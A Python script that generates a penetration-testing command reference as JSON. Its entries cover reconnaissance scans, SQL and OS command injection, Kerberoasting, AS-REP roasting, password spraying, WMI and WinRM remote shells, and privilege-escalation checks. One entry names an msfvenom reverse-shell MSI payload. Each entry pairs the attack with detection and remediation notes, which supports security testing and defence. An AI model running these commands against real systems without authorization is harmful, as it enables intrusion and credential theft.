#!/usr/bin/env python3
"""
VAPT Command Generator — Hybrid approach.
Generates structured command entries from compact template definitions.
Each generated entry follows the exact same schema as hand-written ones.

Run: python scripts/generate_commands.py
"""

import json
from pathlib import Path

OUTPUT_DIR = Path(__file__).parent.parent / "data" / "commands"
OUTPUT_DIR.mkdir(parents=True, exist_ok=True)


def make_entry(id, tool, cat, phase, os_list, cmd, name, desc, args, output,
               use_case, prereqs, mitre, tactic, detections, remediation,
               mistakes, alts, refs, tags):
    return {
        "id": id, "tool": tool, "category": cat, "phase": phase, "os": os_list,
        "command": cmd, "name": name, "description": desc, "arguments": args,
        "expected_output": output, "use_case": use_case, "prerequisites": prereqs,
        "mitre_mapping": mitre, "mitre_tactic": tactic, "detections": detections,
        "remediation": remediation, "common_mistakes": mistakes,
        "alternatives": alts, "references": refs, "tags": tags,
    }


# ============================================================
# RECONNAISSANCE ADDITIONS (target: 55 total)
# ============================================================
RECON_NEW = [
    make_entry("nmap-smb-vuln-scripts", "nmap", "reconnaissance", 1, ["linux","windows","macos"], "nmap --script smb-vuln* -p 445 <target>", "SMB Vulnerability Scripts", "Runs all SMB vulnerability detection scripts including EternalBlue (MS17-010), MS08-067, and other critical SMB flaws.", {"--script smb-vuln*": "All SMB vuln scripts", "-p 445": "SMB port"}, "| smb-vuln-ms17-010:\n|   VULNERABLE:\n|   Remote Code Execution in SMBv1", "Check for critical SMB vulnerabilities that allow RCE.", ["SMB port 445 open"], ["T1190","T1210"], "Initial Access", ["IDS signatures for SMB exploit probes","SMB audit logs"], ["Disable SMBv1","Apply MS17-010 patch","Block 445 at perimeter"], ["Not checking if SMBv1 is enabled"], ["netexec smb <target> -M ms17-010"], ["https://nmap.org/nsedoc/scripts/smb-vuln-ms17-010.html"], ["smb","vulnerability","eternalblue","nse"]),
    make_entry("nmap-dns-brute", "nmap", "reconnaissance", 1, ["linux","windows","macos"], "nmap --script dns-brute -p 53 <target>", "DNS Brute-Force (Nmap)", "Brute-forces subdomains using Nmap's dns-brute NSE script.", {"--script dns-brute": "DNS brute-force", "-p 53": "DNS port"}, "| dns-brute:\n|   www.target.com - 10.0.0.1\n|   mail.target.com - 10.0.0.2", "Discover subdomains via DNS brute-force.", ["DNS port 53 open","Target domain"], ["T1590.002"], "Reconnaissance", ["High volume DNS queries","DNS rate limiting alerts"], ["DNS rate limiting","Split-horizon DNS"], ["Not using custom wordlist"], ["subfinder","amass","dnsrecon"], ["https://nmap.org/nsedoc/scripts/dns-brute.html"], ["dns","brute-force","subdomain","nse"]),
    make_entry("nmap-ftp-anon", "nmap", "reconnaissance", 1, ["linux","windows","macos"], "nmap --script ftp-anon -p 21 <target>", "FTP Anonymous Login Check", "Checks if FTP server allows anonymous login — a common misconfiguration.", {"--script ftp-anon": "Check anonymous FTP", "-p 21": "FTP port"}, "| ftp-anon: Anonymous FTP login allowed\n|   drwxr-xr-x  2 ftp ftp  4096 Jan 01 backup/", "Identify FTP servers allowing anonymous access — may contain sensitive files.", ["FTP port 21 open"], ["T1078"], "Initial Access", ["FTP login events","Anonymous access logs"], ["Disable anonymous FTP","Restrict FTP access","Use SFTP instead"], ["Not checking file contents after finding anon access"], ["ftp <target> (manual)","netexec ftp <target> -u anonymous -p ''"], ["https://nmap.org/nsedoc/scripts/ftp-anon.html"], ["ftp","anonymous","misconfiguration","nse"]),
    make_entry("nmap-http-title", "nmap", "reconnaissance", 1, ["linux","windows","macos"], "nmap --script http-title -p 80,443,8080,8443 <target_range>", "HTTP Title Scan (Mass)", "Grabs HTTP page titles across multiple hosts/ports — quickly identifies web applications.", {"--script http-title": "Get page title", "-p 80,443,8080,8443": "Common web ports"}, "| http-title: Apache2 Ubuntu Default Page\n| http-title: phpMyAdmin\n| http-title: Grafana", "Quickly identify what web apps are running across a network range.", ["Web ports open"], ["T1595"], "Reconnaissance", ["Mass HTTP requests in logs"], ["Remove default pages","Restrict admin panels"], ["Only scanning port 80 (miss 8080, 8443)"], ["httpx -title","aquatone"], ["https://nmap.org/nsedoc/scripts/http-title.html"], ["http","title","web","mass-scan","identification"]),
    make_entry("shodan-search", "shodan", "reconnaissance", 1, ["linux","windows","macos"], "shodan search 'apache country:IN port:443'", "Shodan Search (CLI)", "Searches Shodan's database of internet-connected devices. Passive — doesn't touch the target.", {"search": "Search query","country:IN": "Filter by country","port:443": "Filter by port"}, "192.168.1.10  443  Apache/2.4.52\n10.0.0.5      443  nginx/1.18", "Find exposed services, IoT devices, and misconfigurations without active scanning.", ["Shodan CLI installed","Shodan API key (free tier)"], ["T1596"], "Reconnaissance", ["Passive — no target interaction"], ["Remove unnecessary internet exposure","Use firewall rules"], ["Not combining with other OSINT sources"], ["censys search","zoomeye"], ["https://www.shodan.io"], ["shodan","osint","passive","internet-scanning"]),
    make_entry("httpx-probe", "httpx", "reconnaissance", 1, ["linux","macos"], "cat subdomains.txt | httpx -status-code -title -tech-detect -o live.txt", "HTTP Probing & Tech Detection", "Probes a list of subdomains to find live web servers, their status codes, titles, and technologies.", {"-status-code": "Show HTTP status","title": "Show page title","-tech-detect": "Detect technologies","-o": "Output file"}, "https://api.target.com [200] [API Gateway] [Nginx]\nhttps://dev.target.com [403] [Forbidden] [Apache]", "After subdomain enumeration, identify which are live and what they're running.", ["List of subdomains","httpx installed"], ["T1595","T1592"], "Reconnaissance", ["Multiple HTTP requests from single source"], ["Remove unused subdomains","Restrict access to dev environments"], ["Not checking all ports (-p 80,443,8080,8443)"], ["aquatone","gowitness (screenshots)"], ["https://github.com/projectdiscovery/httpx"], ["http","probing","alive","technology","subdomain"]),
    make_entry("naabu-ports", "naabu", "reconnaissance", 1, ["linux"], "naabu -host <target> -top-ports 1000 -silent", "Fast Port Discovery (Naabu)", "ProjectDiscovery's port scanner — faster than nmap for discovery, designed to feed into other tools.", {"-host": "Target","top-ports 1000": "Top 1000 ports","-silent": "Only show results"}, "192.168.1.10:22\n192.168.1.10:80\n192.168.1.10:443\n192.168.1.10:3306", "Rapid port discovery before detailed nmap scan. Integrates with httpx/nuclei pipeline.", ["naabu installed","Root for SYN scan"], ["T1046"], "Discovery", ["High connection rate","IDS scan detection"], ["Rate limiting","IDS/IPS"], ["Not following up with service detection"], ["masscan","rustscan","nmap -sS"], ["https://github.com/projectdiscovery/naabu"], ["port-scan","fast","projectdiscovery","pipeline"]),
    make_entry("whois-lookup", "whois", "reconnaissance", 1, ["linux","macos"], "whois <domain>", "WHOIS Domain Lookup", "Queries domain registration information — registrar, creation date, nameservers, and sometimes contact info.", {"<domain>": "Target domain name"}, "Domain Name: EXAMPLE.COM\nRegistrar: GoDaddy\nCreation Date: 2005-01-01\nName Server: ns1.example.com", "Gather domain ownership info, registration dates, and infrastructure details.", ["Target domain name"], ["T1596.002"], "Reconnaissance", ["Passive — queries public WHOIS databases"], ["Use WHOIS privacy protection","Redact sensitive contact info"], ["Not checking historical WHOIS (whoishistory.com)"], ["amass intel -whois","host <domain>"], ["https://linux.die.net/man/1/whois"], ["whois","domain","registration","osint","passive"]),
    make_entry("fierce-dns", "fierce", "reconnaissance", 1, ["linux"], "fierce --domain <target_domain>", "DNS Reconnaissance (Fierce)", "Attempts zone transfer, then falls back to brute-force subdomain enumeration if transfer fails.", {"--domain": "Target domain"}, "Found: www.target.com (10.0.0.1)\nFound: mail.target.com (10.0.0.2)\nFound: vpn.target.com (10.0.0.3)", "Quick DNS recon that tries zone transfer first (fast) then brute-force (thorough).", ["Target domain name"], ["T1590.002"], "Reconnaissance", ["Zone transfer attempts in DNS logs","Brute-force queries"], ["Restrict zone transfers","DNS rate limiting"], ["Not trying zone transfer manually first (dig axfr)"], ["dnsrecon","dnsenum","subfinder"], ["https://github.com/mschwager/fierce"], ["dns","zone-transfer","brute-force","subdomain"]),
    make_entry("crt-sh-search", "curl", "reconnaissance", 1, ["linux","macos"], "curl -s 'https://crt.sh/?q=%25.<domain>&output=json' | jq '.[].name_value' | sort -u", "Certificate Transparency Search", "Queries certificate transparency logs to find subdomains — completely passive, no target interaction.", {"crt.sh": "CT log search engine","%25": "Wildcard (URL-encoded %)","jq": "Parse JSON output"}, "www.target.com\napi.target.com\nstaging.target.com\ninternal.target.com", "Discover subdomains from SSL certificate registrations — often reveals internal/staging hosts.", ["Target domain","curl + jq installed"], ["T1596.002"], "Reconnaissance", ["Completely passive — no target interaction"], ["Monitor CT logs for unauthorized certificates","Remove old certificates"], ["Not combining with other subdomain sources"], ["subfinder (includes crt.sh)","certspotter"], ["https://crt.sh"], ["certificate-transparency","passive","subdomain","osint","ssl"]),
]


# ============================================================
# WEB TESTING ADDITIONS (target: 60 total)
# ============================================================
WEB_NEW = [
    make_entry("ffuf-param-fuzz", "ffuf", "web_testing", 4, ["linux","windows","macos"], "ffuf -u 'http://<target>/page?FUZZ=value' -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fs <default_size>", "Parameter Discovery", "Discovers hidden GET parameters by fuzzing parameter names.", {"-u": "URL with FUZZ keyword in param name","-w": "Parameter name wordlist","-fs": "Filter by response size"}, "id                      [Status: 200, Size: 4521]\ndebug                   [Status: 200, Size: 8923]\nadmin                   [Status: 200, Size: 1200]", "Find hidden parameters that may reveal debug info, admin functions, or injection points.", ["Target URL","SecLists wordlist"], ["T1190"], "Initial Access", ["Unusual parameter names in WAF logs","High request volume"], ["Input validation on all parameters","Remove debug parameters in production"], ["Not filtering default response size","Missing POST parameters"], ["arjun (dedicated param finder)","paramspider"], ["https://github.com/ffuf/ffuf"], ["parameter","fuzzing","hidden","web","discovery"]),
    make_entry("ffuf-post-fuzz", "ffuf", "web_testing", 4, ["linux","windows","macos"], "ffuf -u http://<target>/login -X POST -d 'username=admin&FUZZ=test' -w wordlist.txt -fs <size>", "POST Parameter Fuzzing", "Fuzzes POST request body parameters to discover hidden form fields.", {"-X POST": "HTTP method","-d": "POST data with FUZZ keyword","-fs": "Filter size"}, "password                [Status: 200, Size: 3421]\ntoken                   [Status: 200, Size: 3890]", "Discover hidden POST parameters in login forms, APIs, or admin panels.", ["Target URL with POST endpoint"], ["T1190"], "Initial Access", ["Unusual POST parameters in logs"], ["Validate all input parameters","Use CSRF tokens"], ["Not trying different content types (JSON, XML)"], ["burp intruder","wfuzz"], ["https://github.com/ffuf/ffuf"], ["post","parameter","fuzzing","form","web"]),
    make_entry("sqlmap-post", "sqlmap", "web_testing", 4, ["linux","windows","macos"], "sqlmap -u 'http://<target>/login' --data='user=admin&pass=test' --batch --dbs", "SQL Injection on POST Parameters", "Tests POST parameters for SQL injection and enumerates databases if vulnerable.", {"-u": "Target URL","--data": "POST body","--batch": "Non-interactive","--dbs": "List databases"}, "[*] available databases [2]:\n[*] information_schema\n[*] users_db", "Test login forms and POST endpoints for SQL injection.", ["POST endpoint with parameters"], ["T1190"], "Initial Access", ["SQL error messages in logs","WAF SQL injection alerts"], ["Parameterized queries","Input validation","WAF rules"], ["Only testing GET parameters","Not trying --level 5 --risk 3"], ["ghauri","manual testing with Burp"], ["https://sqlmap.org"], ["sqli","post","injection","login","database"]),
    make_entry("sqlmap-cookie", "sqlmap", "web_testing", 4, ["linux","windows","macos"], "sqlmap -u 'http://<target>/dashboard' --cookie='session=abc123' --batch --dbs", "SQL Injection via Cookie", "Tests cookie values for SQL injection — often overlooked by developers.", {"--cookie": "Cookie header value","--batch": "Auto mode","--dbs": "Enumerate databases"}, "[*] cookie parameter 'session' is vulnerable\n[*] available databases [3]:", "Test session cookies and other cookie values for injection vulnerabilities.", ["Authenticated session","Cookie values to test"], ["T1190"], "Initial Access", ["Malformed cookie values in logs","Database errors"], ["Never use cookie values in SQL queries directly","Use parameterized queries"], ["Only testing URL parameters","Forgetting cookie-based injection"], ["manual testing with Burp repeater"], ["https://sqlmap.org"], ["sqli","cookie","injection","session","web"]),
    make_entry("nuclei-full-scan", "nuclei", "web_testing", 4, ["linux","windows","macos"], "nuclei -u http://<target> -severity critical,high,medium -o results.txt", "Full Nuclei Vulnerability Scan", "Comprehensive vulnerability scan using all templates at medium+ severity.", {"-u": "Target URL","-severity": "Filter by severity","-o": "Output file"}, "[critical] [CVE-2021-44228] Log4Shell\n[high] [CVE-2023-22515] Confluence Auth Bypass\n[medium] [exposed-panels] phpMyAdmin", "Broad vulnerability assessment using community-maintained templates.", ["Target URL","Updated templates (nuclei -update-templates)"], ["T1190","T1595"], "Initial Access", ["WAF alerts","Application error spikes"], ["Patch vulnerabilities","Remove exposed panels","WAF rules"], ["Not updating templates","Scanning without authorization"], ["nmap --script vuln","nikto","OpenVAS"], ["https://github.com/projectdiscovery/nuclei"], ["vulnerability","scan","templates","cve","automated"]),
    make_entry("nuclei-exposed-panels", "nuclei", "web_testing", 4, ["linux","windows","macos"], "nuclei -u http://<target> -t exposed-panels/ -o panels.txt", "Exposed Admin Panel Detection", "Detects exposed admin panels, dashboards, and management interfaces.", {"-t exposed-panels/": "Use exposed panels templates","-o": "Output file"}, "[exposed-panels] [info] http://target/phpmyadmin\n[exposed-panels] [info] http://target/wp-admin\n[exposed-panels] [info] http://target/grafana", "Find exposed admin interfaces that should be restricted.", ["Target URL"], ["T1595"], "Reconnaissance", ["Access to admin paths in logs"], ["Restrict admin panels to internal IPs","Require VPN for admin access","Use non-default paths"], ["Not checking non-standard ports"], ["gobuster with admin wordlist","dirsearch"], ["https://github.com/projectdiscovery/nuclei-templates"], ["admin","panel","exposed","management","detection"]),
    make_entry("wpscan-enum", "wpscan", "web_testing", 4, ["linux"], "wpscan --url http://<target> --enumerate u,vp,vt,dbe", "WordPress Vulnerability Scan", "Enumerates WordPress users, vulnerable plugins, themes, and database exports.", {"--url": "Target WordPress site","--enumerate u": "Users","vp": "Vulnerable plugins","vt": "Vulnerable themes","dbe": "DB exports"}, "[+] WordPress version 6.4.2\n[+] User: admin\n[i] Plugin: contact-form-7 (vulnerable)\n[!] 2 vulnerabilities found", "Comprehensive WordPress security assessment — finds outdated plugins, weak users, and known CVEs.", ["WordPress site","wpscan installed"], ["T1190","T1595"], "Initial Access", ["WPScan user-agent in logs","Enumeration requests to wp-json"], ["Keep WordPress and plugins updated","Disable user enumeration","Use security plugins"], ["Not using --api-token for vulnerability data","Missing wp-json API endpoints"], ["nuclei -t wordpress/","manual wp-json enumeration"], ["https://wpscan.com"], ["wordpress","cms","plugins","enumeration","vulnerability"]),
    make_entry("feroxbuster-recursive", "feroxbuster", "web_testing", 4, ["linux"], "feroxbuster -u http://<target> -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,txt,bak --depth 3", "Recursive Directory Brute-Force", "Recursively discovers directories and files up to 3 levels deep with multiple extensions.", {"-u": "Target URL","-w": "Wordlist","-x": "Extensions","--depth 3": "Recurse 3 levels"}, "200  GET  /admin/\n200  GET  /admin/config.php.bak\n301  GET  /admin/uploads/\n200  GET  /admin/uploads/db.sql", "Deep content discovery — finds nested directories and backup files that flat scans miss.", ["Target web server","SecLists wordlist"], ["T1595"], "Reconnaissance", ["High 404 rate","Recursive request patterns in logs"], ["Remove backup files","Restrict directory access","Disable directory listing"], ["Not using recursive mode","Missing backup file extensions (.bak, .old, .swp)"], ["gobuster (non-recursive)","ffuf","dirsearch"], ["https://github.com/epi052/feroxbuster"], ["directory","recursive","brute-force","backup","deep-scan"]),
    make_entry("burp-intruder-basic", "burpsuite", "web_testing", 4, ["linux","windows","macos"], "# Burp Suite Intruder: Sniper mode on login form\n# Target: POST /login\n# Payload position: password field\n# Wordlist: rockyou-top1000.txt", "Burp Intruder — Login Brute-Force", "Uses Burp Suite's Intruder to brute-force login credentials by fuzzing the password field.", {"Sniper mode": "Single payload position","Payload position": "Mark field with §§","Wordlist": "Password list"}, "Request 1: admin/password123 → 302 (redirect = success)\nRequest 2: admin/admin → 200 (login page = failed)", "Brute-force web login forms when you have a username but not the password.", ["Burp Suite running","Intercepted login request","Username known"], ["T1110.001"], "Credential Access", ["Multiple failed login attempts","Account lockout triggers"], ["Implement account lockout","Rate limiting","CAPTCHA after failures","MFA"], ["Not checking for CSRF tokens","Too fast (gets blocked)","Not checking response differences"], ["hydra -f http-post-form","ffuf with POST"], ["https://portswigger.net/burp/documentation/desktop/tools/intruder"], ["brute-force","login","intruder","burp","credentials"]),
    make_entry("commix-injection", "commix", "web_testing", 4, ["linux"], "commix --url='http://<target>/ping?ip=127.0.0.1' --batch", "OS Command Injection", "Automated tool for detecting and exploiting command injection vulnerabilities in web applications.", {"--url": "Target URL with injectable parameter","--batch": "Non-interactive mode"}, "[*] Testing parameter: ip\n[+] The parameter 'ip' is vulnerable to command injection\n[+] Type: Results-based\n$ whoami\nwww-data", "Test web parameters for OS command injection (e.g., ping utilities, file processors).", ["URL with parameter that might execute system commands"], ["T1059"], "Execution", ["Unusual system commands in process logs","Command characters in web logs (;|`$)"], ["Never pass user input to system commands","Use allowlists for input","Implement WAF command injection rules"], ["Only testing with semicolons (try |, ||, &&, backticks, $())"], ["manual testing with Burp","command injection cheat sheets"], ["https://github.com/commixproject/commix"], ["command-injection","rce","os-command","web","injection"]),
]


# ============================================================
# ACTIVE DIRECTORY ADDITIONS (target: 50 total)
# ============================================================
AD_NEW = [
    make_entry("impacket-wmiexec", "impacket", "active_directory", 6, ["linux"], "impacket-wmiexec <domain>/<user>:<pass>@<target>", "WMI Remote Execution", "Executes commands via WMI — less artifacts than PsExec, no service creation.", {"<domain>/<user>:<pass>": "Credentials","@<target>": "Target IP"}, "Impacket v0.11.0\n[*] SMBv3.0 dialect used\nC:\\>whoami\ncorp\\admin", "Stealthier alternative to PsExec — uses WMI for execution, fewer forensic artifacts.", ["Valid credentials","WMI access (port 135 + dynamic)"], ["T1047"], "Execution", ["WMI event logs (Event ID 5857)","Process creation from wmiprvse.exe"], ["Monitor WMI execution","Restrict WMI access","Enable WMI logging"], ["Firewall blocking dynamic ports"], ["impacket-psexec","evil-winrm","impacket-smbexec"], ["https://github.com/fortra/impacket"], ["wmi","lateral-movement","stealth","remote-execution"]),
    make_entry("impacket-getnpusers", "impacket", "active_directory", 6, ["linux"], "impacket-GetNPUsers <domain>/ -usersfile users.txt -no-pass -dc-ip <dc_ip>", "AS-REP Roasting", "Finds accounts with Kerberos pre-authentication disabled and retrieves their AS-REP hashes for offline cracking.", {"-usersfile": "List of usernames","-no-pass": "No password needed","-dc-ip": "Domain controller IP"}, "$krb5asrep$23$svc_backup@CORP:abc123...hash...", "Find and crack accounts without pre-auth — no credentials needed, just valid usernames.", ["Valid username list","Network access to DC port 88"], ["T1558.004"], "Credential Access", ["Kerberos AS-REQ without pre-auth (Event 4768)","Unusual TGT requests"], ["Enable pre-authentication on all accounts","Monitor for AS-REP requests","Use strong passwords on service accounts"], ["Not trying all discovered usernames","Forgetting to crack the hash after"], ["Rubeus asreproast","kerbrute (also finds these)"], ["https://github.com/fortra/impacket"], ["asrep-roast","kerberos","pre-auth","hash","credential"]),
    make_entry("impacket-kerberoast", "impacket", "active_directory", 6, ["linux"], "impacket-GetUserSPNs <domain>/<user>:<pass> -dc-ip <dc_ip> -request", "Kerberoasting", "Requests TGS tickets for service accounts and saves them for offline cracking. Any domain user can do this.", {"-dc-ip": "Domain controller","-request": "Request TGS tickets for cracking"}, "$krb5tgs$23$*svc_sql$CORP...:hash_for_cracking", "Extract service account password hashes — any authenticated user can perform this attack.", ["Any valid domain credentials","Network access to DC"], ["T1558.003"], "Credential Access", ["TGS requests for multiple SPNs (Event 4769)","RC4 encryption in Kerberos traffic"], ["Use AES encryption for service accounts","Long random passwords for SPNs","Monitor for mass TGS requests","Use gMSA accounts"], ["Not cracking with rules (hashcat -m 13100)","Missing service accounts with weak passwords"], ["Rubeus kerberoast","PowerView Get-DomainSPNTicket"], ["https://attack.mitre.org/techniques/T1558/003/"], ["kerberoast","spn","service-account","tgs","credential"]),
    make_entry("evil-winrm-shell", "evil-winrm", "active_directory", 6, ["linux"], "evil-winrm -i <target> -u <user> -p <pass>", "WinRM Shell Access", "Gets an interactive PowerShell session via WinRM (port 5985/5986). Supports pass-the-hash.", {"-i": "Target IP","-u": "Username","-p": "Password (or -H for hash)"}, "*Evil-WinRM* PS C:\\Users\\admin> whoami\ncorp\\admin\n*Evil-WinRM* PS C:\\Users\\admin>", "Get interactive PowerShell on Windows when WinRM is enabled (common in modern AD).", ["WinRM port 5985 open","Valid credentials or hash","User in Remote Management Users group"], ["T1021.006"], "Lateral Movement", ["WinRM connection logs (Event 6)","PowerShell script block logging"], ["Restrict WinRM access","Enable PowerShell logging","Limit Remote Management Users group"], ["Target not in Remote Management Users group","WinRM not enabled"], ["impacket-psexec","impacket-wmiexec","Enter-PSSession (native)"], ["https://github.com/Hackplayers/evil-winrm"], ["winrm","powershell","shell","lateral-movement","remote"]),
    make_entry("certipy-find", "certipy", "active_directory", 6, ["linux"], "certipy find -u <user>@<domain> -p <pass> -dc-ip <dc_ip> -vulnerable", "AD Certificate Services Enumeration", "Finds vulnerable certificate templates in Active Directory Certificate Services (AD CS) for privilege escalation.", {"-u": "Domain user","-p": "Password","-dc-ip": "DC IP","-vulnerable": "Only show exploitable templates"}, "[*] Found vulnerable template: ESC1\n    Template: UserAuth\n    Enrollee can specify SAN\n    → Can impersonate any user!", "Discover AD CS misconfigurations (ESC1-ESC8) that allow domain privilege escalation.", ["Valid domain credentials","AD CS deployed in environment"], ["T1649"], "Privilege Escalation", ["Certificate enrollment events (Event 4886, 4887)","Unusual certificate requests"], ["Audit certificate templates","Remove dangerous permissions","Disable SAN specification for users"], ["Not checking all ESC variants","Missing CA server in environment"], ["Certify.exe (Windows)","certi.py"], ["https://github.com/ly4k/Certipy"], ["adcs","certificate","esc1","privilege-escalation","template"]),
    make_entry("netexec-pass-spray", "netexec", "active_directory", 6, ["linux"], "netexec smb <dc_ip> -u users.txt -p 'Password123!' --continue-on-success", "Password Spraying", "Tries one password against many users — avoids lockout by not trying multiple passwords per user.", {"-u users.txt": "Username list","-p": "Single password","--continue-on-success": "Don't stop at first hit"}, "SMB  10.0.0.1  445  DC01  [+] CORP\\j.smith:Password123!", "Test a common password against all domain users — safer than brute-force (avoids lockout).", ["Username list","Knowledge of password policy (lockout threshold)"], ["T1110.003"], "Credential Access", ["Multiple auth attempts with same password","Event 4625 from single source"], ["Account lockout policy","Password complexity requirements","MFA","Monitor spray patterns"], ["Exceeding lockout threshold","Not waiting between attempts","Using locked-out accounts"], ["sprayhound","kerbrute passwordspray","Invoke-DomainPasswordSpray"], ["https://github.com/Pennyw0rth/NetExec"], ["password-spray","brute-force","credentials","active-directory"]),
]

# ============================================================
# PRIVILEGE ESCALATION ADDITIONS
# ============================================================
PRIVESC_NEW = [
    make_entry("windows-unquoted-path", "manual", "privilege_escalation", 6, ["windows"], "wmic service get name,displayname,pathname,startmode | findstr /i auto | findstr /i /v \"C:\\Windows\\\\\" | findstr /i /v \"\\\"\"", "Find Unquoted Service Paths", "Finds Windows services with unquoted paths containing spaces — allows DLL/EXE hijacking for privilege escalation.", {"wmic service get": "List services","findstr /i auto": "Auto-start only","findstr /v \\\"": "Exclude quoted paths"}, "VulnService  C:\\Program Files\\Vuln App\\service.exe  Auto", "If a service path has spaces and isn't quoted, Windows checks each space as a potential executable location.", ["Shell access on Windows","Service with unquoted path + spaces"], ["T1574.009"], "Privilege Escalation", ["New executables in Program Files subdirectories","Service crash/restart events"], ["Quote all service paths","Audit services regularly","Restrict write access to Program Files"], ["Not checking if you can write to the path","Service running as non-SYSTEM"], ["PowerUp Find-PathDLLHijack","winPEAS"], ["https://book.hacktricks.wiki/en/windows-hardening/privilege-escalation"], ["unquoted-path","service","windows","hijack","privesc"]),
    make_entry("linux-capabilities", "getcap", "privilege_escalation", 6, ["linux"], "getcap -r / 2>/dev/null", "Find Linux Capabilities", "Finds binaries with special capabilities set — can be abused for privilege escalation (like SUID but more granular).", {"getcap": "Get capabilities","-r /": "Recursive from root","2>/dev/null": "Suppress errors"}, "/usr/bin/python3.10 cap_setuid=ep\n/usr/bin/ping cap_net_raw=ep", "Capabilities like cap_setuid allow a binary to change UID — instant root if exploitable.", ["Shell access on Linux"], ["T1548"], "Privilege Escalation", ["Unusual capability assignments","Process running with elevated capabilities"], ["Remove unnecessary capabilities","Audit capabilities regularly","Use AppArmor/SELinux"], ["Not checking GTFOBins for capability exploits","Missing cap_setuid on interpreters"], ["linpeas (checks automatically)","find / -perm -4000 (SUID)"], ["https://gtfobins.github.io"], ["capabilities","linux","privesc","setuid","binary"]),
    make_entry("linux-cron-abuse", "crontab", "privilege_escalation", 6, ["linux"], "cat /etc/crontab && ls -la /etc/cron.* && crontab -l", "Cron Job Enumeration", "Checks for writable cron jobs or scripts that run as root — modify them to escalate privileges.", {"cat /etc/crontab": "System cron jobs","ls -la /etc/cron.*": "Cron directories","crontab -l": "Current user's cron"}, "*/5 * * * * root /opt/scripts/backup.sh\n-rwxrwxrwx 1 root root /opt/scripts/backup.sh", "If a root cron job executes a script you can write to, you can inject commands that run as root.", ["Shell access","Writable cron script or PATH manipulation"], ["T1053.003"], "Privilege Escalation", ["Modified cron scripts","Unusual commands in cron execution logs"], ["Restrict cron script permissions","Use absolute paths in cron","Monitor cron script integrity"], ["Not checking if script is writable","Missing wildcard injection opportunities"], ["pspy (monitor processes without root)","linpeas"], ["https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation"], ["cron","scheduled-task","linux","writable","privesc"]),
    make_entry("windows-always-install-elevated", "reg", "privilege_escalation", 6, ["windows"], "reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated\nreg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated", "AlwaysInstallElevated Check", "If both registry keys are set to 1, any user can install MSI packages as SYSTEM — instant privilege escalation.", {"reg query HKLM": "Machine policy","reg query HKCU": "User policy","/v AlwaysInstallElevated": "Check specific value"}, "AlwaysInstallElevated    REG_DWORD    0x1", "Generate malicious MSI with msfvenom and install it to get SYSTEM shell.", ["Both HKLM and HKCU keys set to 1"], ["T1548"], "Privilege Escalation", ["MSI installation events","New service creation from MSI"], ["Disable AlwaysInstallElevated","Monitor MSI installations","Application whitelisting"], ["Only checking one registry hive (need both)","Not generating MSI payload"], ["msfvenom -p windows/x64/shell_reverse_tcp -f msi","winPEAS"], ["https://book.hacktricks.wiki/en/windows-hardening/privilege-escalation"], ["msi","always-install-elevated","registry","windows","privesc"]),
]

# ============================================================
# SAVE ALL NEW COMMANDS
# ============================================================
def save_commands(filename, commands):
    filepath = OUTPUT_DIR / filename
    # Load existing if present
    existing = []
    if filepath.exists():
        with open(filepath, 'r') as f:
            existing = json.load(f)
    # Merge (avoid duplicates by ID)
    existing_ids = {c["id"] for c in existing}
    for cmd in commands:
        if cmd["id"] not in existing_ids:
            existing.append(cmd)
    with open(filepath, 'w') as f:
        json.dump(existing, f, indent=2)
    print(f"  {filepath.name}: {len(existing)} commands")


if __name__ == "__main__":
    print("Generating VAPT commands...")
    save_commands("reconnaissance_generated.json", RECON_NEW)
    save_commands("web_testing_generated.json", WEB_NEW)
    save_commands("active_directory_generated.json", AD_NEW)
    save_commands("privilege_escalation_generated.json", PRIVESC_NEW)
    
    # Count total
    total = 0
    for f in OUTPUT_DIR.glob("*.json"):
        with open(f) as fp:
            total += len(json.load(fp))
    print(f"\nTotal commands across all files: {total}")
